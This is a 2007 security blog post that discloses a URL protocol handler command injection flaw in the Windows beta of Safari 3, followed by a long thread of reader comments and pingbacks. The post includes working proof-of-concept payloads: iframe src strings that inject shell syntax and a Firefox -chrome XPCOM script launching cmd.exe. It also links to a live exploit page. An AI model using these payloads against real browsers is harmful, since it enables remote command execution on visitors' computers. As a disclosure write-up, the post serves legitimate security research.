Apple released version 3 of their popular Safari web browser today, with the added twist of offering both an OS X and a Windows version. Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecting to see quite a number of vulnerabilities targeted towards this new Windows browser.
I downloaded and installed Safari for Windows 2 hours ago, when I started writing this, and I now have a fully functional command execution vulnerability, triggered without user interaction simply by visiting a web site. I will not sell this one to ZDI or iDefense but instead release it here, as I have done lately with a number of 0day vulnerabilities. This place is where you get my latest research 
A bunch of other security researchers such as David Maynor and Aviv Raff have been pounding safariWin with their fuzzing tools, going through thousands upon thousands of test pages in the hopes of triggering some form of memory corruption for potential exploitation. I am a big fan of fuzzing and believe it can produce some tremendous results, but sometimes good old fashioned application specific knowledge can get you far.
The logic behind this vulnerability is quite simple and the vulnerability class has been known and understood for years, namely that of protocol handler command injection. A browser typically consists of a multitude of different URL schemes, some of which are handled by internal functions and others that are handed off to external applications. On the OS X platform Apple has enjoyed the same luxury and the same curse as Internet Explorer has had on the Windows platform, namely intimate operating system knowledge. The integration with the originally intended operating system is tightly defined, but the breadth of knowledge is crippled when the software is released on other systems and mistakes and mishaps occur. You can still find references to the OS X proprietary URL protocols open-help-anchor: and network-diagnostics: inside the resource files for the Windows release.
URL protocol handlers on the Windows platform work by executing a process with specific command line arguments. When Apple released Safari for the Windows platform they neglected to implement a proper level of input validation for these arguments, which means that you can break out of the intended confines and wreak havoc. A typical request for a URL such as myprotocol://someserver.com/someargument would be turned into a command line resembling the following.
“C:\Program Files\My Application\myprotocol.exe” “someserver.com/someargument”
This works almost as expected in Safari. With a simple link you cannot pass along arbitrary characters to the command line which is later executed and most attempts at doing so will simply be URL escape, such that myprotocol://someserver.com/some"[SPACE]argument is turned into
“C:\Program Files\My Application\myprotocol.exe” “someserver.com/some”%20argument
This cannot be used to exploit Safari as the command line to be executed is simply invalid. However, Safari does not properly validate the input when these same requests are handled through IFRAME elements, such as
<iframe src=’myprotocol://someserver.com” < foo > bar | foobar “arg1′></iframe>
which is turned into the following command line.
“C:\Program Files\My Application\myprotocol.exe” “someserver.com” < foo > bar | foobar “arg1″
As the knowledgeable reader might have noticed we now have everything we need to implement an attack against the entire range of available URL protocol handlers on the Windows platform. We could pick the telnet or callto protocols and provide unfiltered input to an argument of our choice. For this demonstration I have opted to attempt an exploit against the gopher: URL protocol which is handled by my local Firefox installation. We hash together an example request..
<iframe src=’gopher://larholm.com” |cmd /c echo “FOO’></iframe>
..Fire up procexp, launch safari and watch the output.
“C:\PROGRA~1\MOZILL~3\FIREFOX.EXE” -url “gopher://larholm.com” |cmd /c echo “FOO” -requestPending
Now this might be fun enough, but what if we wanted something a bit more customizable? Firefox is built on top of the Mozilla XPCOM platform and we might as well use some of these capable interfaces at our disposal to handle process instantiation. The code we want to execute is the following.
C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath(’C:\\windows\\system32\\cmd.exe’);
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0);
alert(process);
Due to the levels of URL escaping the following might be a bit confusing to read, but feel free to dissect it for your own variations.
<iframe src='gopher://larholm.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath(’C:’+String.fromCharCode(92)
+String.fromCharCode(92)+’Windows’
+String.fromCharCode(92)+String.fromCharCode(92)+’System32′
+String.fromCharCode(92)+String.fromCharCode(92)+’cmd.exe’);
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0);alert(process)’></iframe<
And there you have it, command execution. A fully functional PoC exploit is located below. Warning: This WILL crash your Safari browser on Windows. Close any existing Firefox processes that you might currently be running, then navigate Safari to the following page.
http://www.larholm.com/vuln/safaripoc.html
The above PoC exploit will exploit Safari by bouncing through Firefox via the Gopher protocol, passing on unfiltered input for the -chrome argument that Firefox exposes. When it has done this it will launch C:\Windows\System32\cmd.exe with any arguments that have been specified in the call to the process.run method.
It is important to know that, even though this PoC exploit uses Firefox, the actual vulnerability is within the lack of input validation for the command line arguments handed to the various URL protocol handlers on your machine. As such, there are a lot of different attack vectors for this vulnerability, I simply chose Firefox and the Gopher URL protocol because I was familiar with these.
I hope you enjoyed the fruits of my 2 hours of labour. Please feel free to add my RSS feed to your reader and come back again tomorrow or next week for a fresh batch of 0day vulnerabilities
Cheers
Thor Larholm
UPDATE
The site was down for a couple of hours due to Slashdot, TechMeme and Reddit.
You might want to consider disabling the smart quote BS for posts that contain code fragments, as it is sort of hard to decipher what “C:\PROGRA~1\MOZILL~3\FIREFOX.EXE” -url “gopher://larholm.com” |cmd /c echo “FOO” results in - e.g. what happens to the cmd that is unmentioned in the accompaning text…
[...] Bah. Hardly a day has gone by and the bugs are coming out to roost. Larholm.com - Me, myself and I ? Safari for Windows, 0day exploit in 2 hours And here is one from Maynor (the guy who Apple vilified). He says he isn’t going to report [...]
Yes, Windows sucks. No safty at all.
It’s not clear to me whether one should ding the browser or the OS for this one. OS X has the same problem, albeit withthe potential at least of being somewhat safer as the normal UNIX “exec” runs programs without passing through shell argument evaluation.
It should not be the browser’s responsibility to keep track of which applications are safe to use as protocol handlers and which should be avoided. Either the operating system needs to provide an API for finding or calling protocol handlers that are designed to handle for untrusted requests, or the browser should maintain its own database of such safe protocol handlers and ignore the database provided by the operating system.
I suggested that this be fixed on OS X, at least, back in 2004: http://www.scarydevil.com/~peter/io/osx-security.html
Of course, Microsoft’s been sitting on far more serious design flaws since 1997, so I honestly don’t expect Apple to act on this one until at LEAST the end of the decade. If at all.
[...] Larholm?????????URL protocol handler command injection vulnerability???????????????? bug Safari windows ??? Jun 12, 2007 - [...]
[...] well,i dont see any reason to replace FF. It crashed couple of times already.. Larholm.com - Me, myself and I ? Safari for Windows, 0day exploit in 2 hours Safari for Windows: Released and hacked in a day | InfoWorld | News | 2007-06-11 | By Robert [...]
[...] laut hier und hier (Gefunden bei Slashdot) wurden in der Windows-Version schon Stunden nach dem erscheinen 4 DoS Bugs [...]
[...] sebelum menggunakan produk ini di Windows, ada baiknya untuk membaca artikel yang mengatakan bahwa dia berhasil mencari bug di Safari for Windows dalam waktu 2 jam setelah di rilis. Kalo masih ragu, sebaiknya menunggu patch dari Apple (oia, kalo di MacBook “patch” [...]
[...] URL protocol handler command injection vulnerability [...]
I don’t know, the way you described it seems more like a hole in the way Windows handles things than a Safari hole. Does a Windows API call launch a shell process, or does Safari manually go and run a command line program? If it’s the Windows API for URL handling, then it’s clearly broken. Every program that needs to grab a URL should not be responsible for patching holes in Windows.
[...] 2: Thor Larholm has discovered a 0 day exploit in Safari within 2 hours of installing. Posted by Funtime on Tuesday, June 12, 2007, at 12:00 [...]
Nice work! Both the thorough description and the fact that you decided to reveal it rather than just saying “nah-nah Apple, I pwnd ur borwser”. Should be interesting to see their reaction (and reaction time) on this.
Wow, amazing
I don’t like Safari on XP anyway, some pages don’t even render correctly… whatever. Thanks for the tip, I’m staying on Opera 
[...] “. Stesso modo di agire, differente persona, a due ore dal rilascio Thor Larholm, pubblica un interessante articolo in cui dimostra come Safari sia affetto da una vulnerabilità classe “URL protocol handler command [...]
[...] Maybe if I read this beforehand I would have second thought about installing it… or maybe not. [...]
really good stuff, thanks for your effort. Safari wasn’t careful enough to filter out improper inputs..and u proved it.cheers!
safaripoc.html crashes Safari 3 on Mac OS X too
[...] Thor Larholm fand einen Bug, mit dem Angreifer beliebigen Programmcode ausführen und somit Kontrolle über ein fremdes Windows-System verschaffen können. Dazu reicht lediglich der Aufruf einer präparierte Webseite. [...]
Your exploit crashes safari 3 beat om the mac too (and opens firefox)
[...] Mehr dazu hier: larholm.com [...]
[...] Errata Security managed to find 6 bugs in one afternoon, one of which they were able to weaponize. Thor Larholm has created a means of remote executing any code he desires, in a mere 2 [...]
[...] otro lado Thor Larholm encontró una vulnerabilidad de inyección de código en el manejador de protocolos URL, que también permite ejecución remota de [...]
[...] La doua ore, a aparut primul exploit. [...]
Well… I’m not very surprised about this exploit - it’s a beta. But on the other hand it suckz alot that Apple released it that early. I wouldn’t recommend installing it anyway on Windows until it’s final.
[...] Safari coming to Windows (but apparantly it has serious security-flaws in it’s current state. More about that here, here and here). [...]
[...] the same time Thor Larholm found a URL protocol handler command injection [...]
[...] give it a whirl—if you have the time and the system resources. Always be on the lookout for security threats, [...]
it crashes safari on the mac as well
Apple software just works doesnt it ?
Safari 3 Beta for Windows XP & Vista…
I prefer to wait for the final release version in October to know whether Safari is the faster web browser. For the time being, I?ll use a Safari theme on Firefox?…
[...] has released a brand new version of their Safari browser, and it only took 2 hours for someone to hack an exploit out for it. There are some good reviews around as to what makes the software so compelling, but you [...]
It doesn’t crash Safari 2.0.4 (latest) on the Mac, but it opens Firefox nonetheless.
[...] mal 2 Stunden hat es gedauert, bis die erste Sicherheitsluecke in der Windows-Version von Safari 3 gefunden wurde. Und da sagt noch mal jemand, Apple-Software [...]
[...] Larholm.com [...]
[...] 4: Thor Larholm has also found a bug. http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/ I’d like to note that we found a totl of 6 bugs in an afternoon, 4 DoS and 2 remote code [...]
[...] Sources: Errata Security | Larholm.com [...]
[...] No sooner do I mention Safari on Windows and Niall goes off and finds someone’s zero day exploit [...]
[...] 12 June 2007: Several security vulnerabilities have already been identified in the Safari/PC beta, so if you are [...]
Mmhh, there is a EULA
IMPORTANT NOTE: THIS IS “BETA”, PRE-RELEASE, TIME-LIMITED SOFTWARE MEANT FOR EVALUATION AND DEVELOPMENT PURPOSES ONLY. THIS SOFTWARE SHOULD NOT BE USED IN A COMMERCIAL OPERATING ENVIRONMENT OR WITH IMPORTANT DATA. BEFORE INSTALLING THIS APPLE SOFTWARE, YOU SHOULD BACK UP ALL OF YOUR DATA AND REGULARLY BACK UP DATA WHILE USING THIS APPLE SOFTWARE.
Which pretty much implies it is risky to use the software. I usually do not see this in the standard software downloads.
They call it beta?
They will be thankful for your testing, even though they will not answser you. Free job for apple you do?
Not that I am against you. Just pointing out my feelings.
Pedro.
[…] Sicherheitsluecke in der Windows-Version von Safari gefunden, Apple ist unsicher […]
[...] Links:- Safari Beta 3 Download- Safari Beta 3 Plugins (Win)- Die Keynote- 0Day Exploit für Safari Windows [...]
EULA’s are there to cover themselves leagally (which is good sense) but when you read the marketing drivel.
“Now you can enjoy worry-free web browsing on any computer. Apple engineers designed Safari to be secure from day one.”
they are kinda asking for it.
[...] (left) has released an advisory with proof-of-concept code to demo the vulnerability, which can be used to take complete control of [...]
Hey, fine to now that my Safari is running on OSX wich is the most secure Operating System ever!!!!
NOT!!!
[...] Safari for Windows, 0day exploit in 2 hours [Larholm.com] tr { border: 0px } td { cellborder: 10px} table { border: 1px solid black } [...]
Only Jobs wannabee fanboys will even try this.
Who gives a flying xxxx what apple does?
[...] [...]
[...] Aviv Raff foi o primeiro. Depois foi a vez de David Maynor e Thor Larholm.. [...]
[...] vulnerabilità (4 di tipo DoS e 2 remote execution) a poche ore dal lancio.La conferma arriva da più fonti indipendenti tra loro, andando a confermare la veridicità della notizia che Safari per Windows non sia nato [...]
[...] Meldung Sicherheitsbugs Apples Browser Safari for Windows XP and Windows Vista: Link Link zum Sicherheitsexperten: Thorn Larholm Link zum Apple Safari Exploit: Link [...]
[...] veteran security researcher Thor Larholm writes in his blog he found a 0day vulnerability within two hours. The flaw exists within how Safari handles URL [...]
[...] veteran security researcher Thor Larholm writes in his blog he found a 0day vulnerability within two hours. The flaw exists within how Safari handles URL [...]
[...] Well, the Safari browser for Windows was released yesterday and so far in less than 24 hours there have been several bugs discovered. (ex. 2) (ex. 3) [...]
[...] mich aber besonders die Sicherheitslücken, die unter Windows eklatant sind. So gelang es etwa Tor Larholm bereits nach 2 Stunden eine Lücke zu finden mit der Angreifer auf dem System beliebigen Code [...]
[...] Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious [...]
[...] Thor Larholm who described himself as “a pretty ordinary guy from a small town in Denmark”, also downloaded and installed Safari for Windows on his PC. After a few hours of testing he found a serious bug: “I now have a fully functional command execution vulnerability, triggered without user interaction simply by visiting a web site.” [...]
[...] Already someone has found a massive hole in Safari. Read more about it at larholm.com [...]
[...] already 6 zero day exploits and many, many crashes for the browser. You can read about them here here here and here. Which makes the following image from the Apple website, borrowed from [...]
[...] Ach, Safari? Ja! Safari 3 kommt natürlich mit Mac OS X 10.5 und auch für Windows XP und Vista. Ab sofort als Snapshot (offiziell eine Public Beta) für Windows zum Download erhältlich. Allerdings noch sehr instabil und crashed schon beim Aufruf von Google… anscheinend gibt es Probleme mit der deutschen Sprache bzw Fonts. Sicherheitslücken wurden auch schon 2 Std später in Safari für Windows entdeckt. [...]
[...] a beta of Safari for Windows (I knew it! They’re porting iLife to Windows.). Guess what. Someone found a security exploit in only two hours. Can you believe that? Oh well, it’s a beta after all. digg_url = [...]
[...] A Aviv Raff On, através de testes básicos de segurança, encontrou uma falha de corrupção de memória que pode ser explorada por usuários mal-intencionados. E não é só: algumas horas depois, mais falhas foram descobertas. [...]
[...] Para finalizar, ainda um alerta aos utilizadores, particularmente os do Windows Vista, que eventualmente consigam instalar funcionalmente esta versão beta do Safari: ao que parece, a segurança deixa muitíssimo a desejar! [...]
Good research, but what’s with this “lousy track record” and “hostile to expolits” BS? Come on man, lose the chip on the shoulder - it just looks unprofessional.
[...] Raff (Bugtraq ID: 24431). Apple Safari for Windows Memory Corruption Vulnerability by David Maynor. Apple Safari for Windows URL Protocol Handler Command Injection by Thor [...]
[...] Kriptópolis leo que en sólo dos horas Thor Larholm ha reventado Safari 3 para Windows, tras comprobar que este navegador no valida bien las entradas que le llegan a través de elementos [...]
[...] reports indicating that the browser presents a security risk to Windows users. Thor Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious [...]
[...] Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious [...]
[...] security researcher Thor Larholm wrote in his blog that he found a “0day” vulnerability in Safari within two hours. The flaw exists in how [...]
[...] June 12th, 2007 [link][more] [...]
[...] separate reports indicating that the browser presents a security risk to Windows users.Thor Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious code.David [...]
[...] the new browser, officially still on beta-3, may not be as good as others. A zero-day exploit was revealed in a mere of two hours. Another bug was also discovered within a short period. These make IE looks [...]
[...] people have not only found major bugs (which is expected from a beta), but also possibly exploitable bugs that could have major security [...]
[...] famosos crashes e dois a permitirem a execução remota de código. Como não há duas sem três, Thor Larholm (cujo blog não consigo abrir à hora deste post) focou exactamente os mesmos [...]
[...] Webbrowser now publicly available for beta testing. Some people downloaded it and it took them 2 hours to get a serious security hole which lets safari executing any program you’d like to. [...]
[...] getting some criticism over security flaws made not so far after the release. Thor Larholm found a 0 day exploit that causes Safari to shut down whenever you visit a website containing the malicious code. David [...]
[...] Thor Larholm [...]
[...] del Safari para Windows que permitiría ejecuciones remotas de código. De igual forma Thor Larholm encontró otra más. Como que la gente de Cupertino no tuvo mucho tiempo de validar la seguridad del nuevo [...]
[...] Maynor dichiara 6 bug scoperti in poche ore 4 sono DoS e 2 remote execution , mentre Thor Larholm ha pubblicato un exploit che chiude il browser visitando una pagina che sfrutta un ulteriore [...]
[...] Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious [...]
[...] qua e [...]
[...] it’s release, there are already exploits circulating for Safari for Windows. Thor Larholm has discovered a remote command execution vulnerability and some other researchers have reportedly discovered more [...]
[...] mult timp Safari pe Windows si nu este asa de stabil. Se pare ca nici prea sigur nu e din moment ce Thor Larholm a gasit in numai doua ore de la lansare un [...]
[...] for full coverage. The main thing now is the bugs discovered in Safari for Windows. Tor Larholm at larholm.com found two within hours after the speech. David Maynor at Errata Security found six. At [...]
[...] keeping track of a few announcements across the web, including a fully disclosed 0-day exploit that Thor Larholm apparently found yesterday within two hours of the software’s release (and says more are [...]
[...] was released. David found 4 DoS bugs and 2 remote execution vulnerabilities, meanwhile Thor found a URL protocol handler command injection vulnerability that allows remote command execution and he wrote it will full description about the bug. If you [...]
[...] An exploit has been found in the beta. Don’t use this for casual [...]
[...] 2 Neben Darstellungsfehlern häufen sich mittlerweile auch die Bug-Reporte. Thor Larholm will bereits zwei Stunden nach der Veröffentlichung einen 0day-exploit für Safari 3 [...]
Breaking stuff again, eh? :p
[...] hours later, Thor Larholm found a vulnerability which allows command execution to be run [...]
[...] Safari for Windows, 0day exploit in 2 hours [...]
thats why i like firefox
jenny
http://www.spaml.com
Given that Apple has had a lousy track record with security on OS X
Then why is, dipstick, that absolutely none of the security problems that plague Microsoft’s products plague OS X if their track record is so “lousy”?
No, I don’t expect an actual answer.
[...] released its Safari browser for Windows today and already there are some security issues with the beta version. We hope this does not start browser wars all over [...]
[...] Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious [...]
the OS is irrelevant in this instance IMHO. utilising user-supplied data, unfiltered and unverified is pure-and-simply bad form. blaming the OS in this case is like blaming the browser for a XSS attack on a badly written php forum in my opinion.
[...] hours later, Thor Larholm found a vulnerability which allows command execution to be run [...]
[...] course, day one is always amusing. First, it’s clear that the security claims are not fully justified. And moving from the confines of the OSX world, which is generally [...]
[...] Thor Larholm???????????1????????????????????????????????????Safari??????????????????????????? ??????? [...]
[...] Safari for Windows, 0day exploit in 2 hours Larholm.com - Me, myself and I ? Safari for Windows, 0day exploit in 2 hours By Thor Larholm The below PoC exploit will exploit Safari by bouncing through Firefox via the [...]
nice..
tom
yes, it’s a beta, but it behaves like a pre-alpha nightly. first bugs i saw within less than a minute: “show all bookmarks” -> crash; preferences are not saved; auto-hidden windows taskbar isn’t allowed to pop up over maximized safari; some elements of web pages are just not displayed. of course the vulnerabilities are much worse than these stupid bugs, but you don’t see them at first glance. they just shouldn’t have gone public with this.
Oh, so the guy who misrepresented the Airport issue found and reported eight problems within six hours of Safariwin’s release. Could some one wake me when he either publicly documents it so it can be verified or some other research finds anything remotely similar?
Most of these are crashers. Finding something that can cause a beta application to crash isn’t unexpected. Lets also note the source of these “vulnerabilities” this is the guy who faked hacking a Mac and refuses to give Apple any information on these bugs. This is someone with a grudge trying to smear Apple because Apple exposed his previous scam.
Playing the “we don’t inform the vendor if we think the vendor spins things” for beta software is, uh, what is the word…. spin.
It’s Beta software, if you use it, expect bugs, and when you find htem, report them like a good kid. You pepole aren’t downloading the beta expecting to use some free piece of software, expecting perfection and never having to actually beta test, are you
Bugs are exactly what Apple wanted to expose.
The point of having a beta is so that people can find all these holes and bugs, report back to apple, and then apple fix them. If the final version comes out and its still crappy, then b**** and moan but give me a break. I’m not taking any security complaints seriously until then. Stop making such a big deal over an unfinished product.
[...] researcher Thor Larholm wrapped up Safari’s opening day with the most damaging disclosure of all: A remote execution vulnerability accompanied by proof-of-concept exploit code. That code — [...]
100th POST XD NICE
France edu
[...] researcher Thor Larholm wrapped up Safari’s opening day with the most damaging disclosure of all: A remote execution vulnerability accompanied by proof-of-concept exploit code. That code — [...]
Peter da Silva said “It’s not clear to me whether one should ding the browser or the OS for this one. OS X has the same problem, albeit with the potential at least of being somewhat safer as the normal UNIX “exec” runs programs without passing through shell argument evaluation. It should not be the browser’s responsibility to keep track of which applications are safe to use as protocol handlers and which should be avoided. Either the operating system needs to provide an API for finding or calling protocol handlers that are designed to handle for untrusted requests, or the browser should maintain its own database of such safe protocol handlers and ignore the database provided by the operating system.”
You’d hope (well, “expect” actually) that a developer who trumpets as the twelfth reason to love their new browser as “Security. Now you can enjoy worry-free web browsing on any computer. Apple engineers designed Safari to be secure from day one.” would have had the wit to make such an assessment as you just did, presumably in a few minutes of thinking about these issues, before they publicly released any code. After all, as you point out, deciding how to (or even whether to) pass-off handling of external protocols is necessarily a risky operation in the design of any browser, especially when doing so cross-platform, and any marginally security-clueful developer is surely aware of that (and I guess this all means that Apple’s Safari developers are NOW aware of it).
And the extensive use of fuzzing of late is also surely well-known to any marinally security-clueful developer (and NOW to Apple’s Safari developers).
The plethora of nasty, and mostly pretty basic, security bugs found so quickly within the release of Safari for Windows makes one seriously question what kind of security Apple’s engineers designed in “from day one”.
It also makes me wonder how many more have been found and NOT publicly reported. Much as the fan boyz are whining about these discoveries, SMART Apple users will be recovering from a brown alert moment about now…
[...] Aviv Raff , David Maynor, and Thor Larholm all reported flaws in the browser shortly after it was made available on Monday. Maynor alone said [...]
[...] (13/6/07) : An 0day exploit has been found on this [...]
[...] Aviv Raff , David Maynor, and Thor Larholm all reported flaws in the browser shortly after it was made available on Monday. Maynor alone said [...]
Your post is rather deceptive.
The way you present it, you imply that the lack of filtering allows you to feed data to the cmd.exe shell interpreter. This is incorrect and you know it.
The process set up by the URL handler is executed directly, with the arguments specified, but at no time are the arguments interpreted by a shell. Thus the |& etc shell metacharacters have no effect.
The real exploit is that it is possible to call URL handlers with arguments that make them do unexpected things. Whether this exploit is in Safari or the URL handler mechanism is open to debate.
It’s trivial to fix this on the URL handler side, for instance: register the URL handler such that it treats the rest of its command arguments as a single URL, instead of parsing it as actual arguments. Considering that URL handlers are meant to be hyperlinked, typically which means being called by remote methods, I’d say it’s up to them to handle security properly. That means the real exploit you present here is Firefox’s lousy URL handler registration.
Given that this same issue may apply to several URL handlers makes it more complicated than that, of course.
But for crying out loud, don’t add sensationalist crap that obscures the real nature of important exploits! If you wish to be treated like a professional at all, you owe it to your readers to update this post to make it clear that the shell is not involved.
[...] Larholm ya le encontró también un exploit que permite la ejecución de código [...]
[...] browser) for Windows, according to the Inquirer there is already an exploit for it. According to Larholm it only took 2 hours to figure out the exploit. I highly recommend that people look at his site [...]
[...] http://blogs.zdnet.com/security/?p=283 http://news.com.com/8301-10784_3-9728500-7.html http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/ http://erratasec.blogspot.com/2007/06/niiiice.html Tags: Apple, Beta, Browser, Hacking, News, OS [...]
[...] keeping track of a few announcements across the web, including a fully disclosed 0-day exploit that Thor Larholm apparently found yesterday within two hours of the software’s release (and says more are [...]
[...] SpOn: Safari für Windows gehackt Thor Larholm, Freizeithacker aus Dänemark, will bereits zwei Stunden, nachdem er Safari für Windows heruntergeladen hatte, einen ersten wunden Punkt entdeckt haben. [...]
To hard for Safari, i hoped that it would be better then all the other browsers… but still it didn’t
[...] In der Tat kommen da viele weitere Teststunden auf uns zu, was zwar auch meinen Job sichern hilft, aber auch langweilige und ungeliebte Arbeit bedeutet. Helfen könnte dabei das Debug-Menü, das sich auch unter Windows aktivieren lässt. Und Apple hat mit dieser Beta gleich den Beweis geliefert, dass Safari auf Windows nicht mit Safari auf Mac gleichzusetzen ist. Andererseits gewöhnt sich Apple an die Windows-Welt meiner Meinung nach ein wenig zu schnell: schon am ersten Tag wurden die ersten Sicherheitslücken entdeckt. [...]
Windows sucks…thats it…software running on winblows will allays be unsecure….but there will allways be fools in this world who just dont listen ;O)
p.s Larholm=sucks
[...] hours of it’s release by Dave Maynor (Dave has further links in his article), and another by Thor Larholm. Thors expalnation of what’s happening is in depth and unbiased. Basically, Apple don’t [...]
[...] ? ???? ?? ?? ??????? ?? Security Apple engineers designed Safari to be secure from day one. ????… ???? ??. Thor Larholm ???? ?? ?????? exploit ?? ???? ??????? ?? 0 ??? ? 2 ????. ????????? ? ???????? ?????? ???. [...]
Ken, I approved your comment unedited so that I could clear up some misunderstandings. I am not David Maynor (the Airport guy) and I did not work together with Maynor to find this vulnerability. Maynor simply accredited me on his blog for also finding holes in Safari.
Maynor claims to have found some memory corruption problems through fuzzing. This vulnerability is completely separate and I did not use fuzzing to find it.
I have also chosen to publish all the technical details for this vulnerability together with a working Proof-of-Concept exploit, so that you may independently verify the vulnerability.
Regards
Thor Larholm
Random Reader from Comment 110, I published the PoC exploit so that you could independently verify the operation of this vulnerability. Firefox is just one of many attack vectors.
The lack of input validation occurs before Firefox is ever launched, something which you can verify even with Process Explorer. Launch the exploit, right-click firefox.exe in procexp, pick properties, select the Image tab and look at the second line called “Command line:”.
You will notice that Safari has not treated the rest of the command argument as a single URL, simply because it does not filter out quotes and whitespace. As such, we can affect the command line used to launch the URL handler executable.
Regards
Thor Larholm
Mike from Comment 118, this vulnerability is not caused by any failings in Windows but by a lack of input validation in the Safari code. It’s the Safari executable that chose to execute a command line without filtering the input.
Regards
Thor Larholm
Very interesting article, and again I am impressed by the work of Larholm.
Then I made the mistake and began to read the comments. Please guys, before commenting on the article,
1) read it again so you know what Larholm says and what you just thought he said, or what others have said
2) if you don’t care about Apple, Safari or security in browsers, a comment probably isn’t necessary
3) there are only two Apple ‘bashings’ in Larholm’s article:
a) “Given that Apple has had a lousy track record with security on OS X…” doesn’t mean that Larholm actually says it’s worse than on other companies on other operation systems
b) “…in addition to a hostile attitude towards security researchers” is quite interesting, but if your reaction to anyone saying something bad about Apple or Apple products is to instinctively hit back then you are probably not thinking straight - consider waiting 24 hours before posting your response
4) sure it’s beta - now, thanks to all these guys finding (most of) the vulnerabilities Apple can fix them before it’s ready to ship to consumers
I’m probably not going to use Safari, except for testing purposes, but I am grateful there’s a chance it could be secure. Now.
[...] código. Thor Larholm encontró otra vulnerabilidad del mismo tipo (ejecución remota de código) a través del manejador de protocolo URL. Además de que algunas páginas (vease los resultados de Google en las búsquedas, barrapunto, [...]
Thanks for responding Thor.
> You will notice that Safari has not treated the rest of the command argument as a single URL, simply because it does not filter out quotes and whitespace. As such, we can affect the command line used to launch the URL handler executable.
Yes, I’m not arguing against that. What I meant about fixing this on the URL handler side is that the target process should treat the command line arguments properly. It did, after all, register itself as a URL handler. Part of that registration allows it to specify any arguments it wants prior to caller’s arguments. Since Firefox already registered its handler to place “-url” just before the caller’s argument, when it processes the commandline it can simply treat everything after “-url” as a single argument (sort of like the “–” convention for some GNU tools).
[ On Windows, it's actually up to the application to parse the commandline arguments how it likes -- the typical argc/argv convention, quote handling etc is handled by the C runtime or other language-specific library, not the OS itself. Windows' native GetCommandLine() returns a single string. ]
Or it could just register for DDE use and bypass the command line parsing issue entirely, like most of the URL protocol handlers on my machine at the moment. IE is not usable as a target for this particular exploit because of this.
My major point is just that the shell is not involved. My minor point is that the URL handler should treat input securely, though I am conceding that a lot of handlers probably don’t, which makes this less simple than “not Safari’s fault”. Obviously Safari needs to address this, since it’s now a known attack vector that it can mitigate.
The Firefox guys could easily prevent themselves from being exploited by anything this way though, as can any app that registers URL protocol handlers.
[...] Todavia, nem tudo é um mar de rosas. Itunes é uma aplicação que consome muita memória e alguns utilizadores estão a queixar-se que o Safari no Vista consome até 150MB de memória. Mais, existem falhas por todo o lado, têm sido detectados bugs por David Maynor, o jovem que programou o Airport hack e por Thor Larholm que lançou uma série de exploits. [...]
Hm, smart dashes. The GNU tool convention I was referring to is the “double dash” signal to ignore options on the rest of the command line, in case any remaining arguments begin with a dash.
Since Safari crashes while attempting to load its homepage on my Compaq, I don’t think exploits are going to be an issue. Gotta be able to run to be exploited, right?
Random Reader, I can definitely understand your point of view. It would be more prudent if Firefox had registered its URL protocol handlers for use through DDE. However, even the telnet: protocol handler that is registered by Microsoft is called by Safari through unfiltered command line arguments.
When Safari chooses to invoke external applications with a command line, protocol handler or not, it should filter the input appropriately. It cannot be the responsibility of third party applications to control how they are invoked, especially when those applications have a wide range of possible command line arguments that can be specified in any order.
Firefox has already designated where it wants the input when called as the gopher handler application, namely ‘Firefox.exe -url “%1″ -requestPending’, and it’s not exactly rocket science for Safari to keep any arbitrary input inside those quotes.
Safari also forgets to filter the input for command line arguments on OS X in some other scenarios that I will probably detail soon.
Regards
Thor Larholm
[...] bugs, 2 Remote Execution vulnerabilities by David Maynor (known for his Apple Wi-Fi hack) and a URL protocol handler command injection vulnerability that allows remote command execution by Thor [...]
Actually, if Safari is doing this right, it’s using ShellExecute() to do the work. In this case it doesn’t actually know whether it’s a command line, a DDE conversation, or something else entirely.
(This is just to say that it can’t actually know what Firefox wants; I’m not making any particular argument with this comment.)
[...] was zeroed in 2 hours of Safaris release! The credit goes to Thor Larholm, who wrotes in his post Safari for Windows, 0day exploit in 2 hours …. The logic behind this vulnerability is quite simple and the vulnerability class has been [...]
I hope Apple can fix this when they release the ‘Real’ version.
Something else just occurred to me, something I lost sight of while thinking about command lines and such. URLs have a specific allowed character set and everything else must be escaped, right? Ignoring all the other points for a moment, invalid URLs are being passed around here.
That puts this issue squarely on Safari, even with my other arguments.
[...] engineers designed Safari to be secure from day one.” As Larholm explained on his blog, that may very well be correct: Its engineers obviously designed Safari to take advantage of [...]
great… I just installed safari for windows yesterday…. woop dee do.
[...] of Safari as ‘the world’s best browser’, despite its instability and the discovery of security [...]
haha! owned. Nice work! I should set this PoC as my safari homepage =P FireFox 4 Life
[...] hours after the launch of the public beta, security experts such as Aviv Raff, David Maynor and Thor Larholm had publish findings on security flaws found on Safari 3. Immediately over throwing the claims made [...]
[...] ???????: ??? ????? ?? ????? ???????, ???? ?????? ??? ????? ????????? ??????. ??? ??? ????? ?? ??? ????????? ??????? ??? ?????? ?? [...]
[...] that announced vulnerabilities in Safari shortly after its release are Aviv Raff, David Maynor and Thor Larholm.These guys claim several of the vulnerabilities they found could let an attacker remotely gain [...]
You forgot to mention it is a Beta release.
I guess coming from Windows you are probably used to Beta OS software being passed off to you as release standard.
For Strifer, and the other mac fanboys crying “it’s beta”, you should know that the implication of something being a Beta release has many different interpretations.
Historically, a beta release has limited distribution to some select power users who can then give feedback on an almost complete product.
When Steve Jobs announces Safari for Windows on stage at a major conference and apple.com links from the frontpage to its download then it is no longer a beta in the historical sense. It is instead a full on release, with your average Joe User visiting the webpage and seeing the bold black SAFARI 3, disregarding the grayed out Public Beta and thinking “ooh shiny”.
This release is intentionally not a beta in the historical sense and tens of thousands ordinary users, if not hundreds of thousands, will download and install this application.
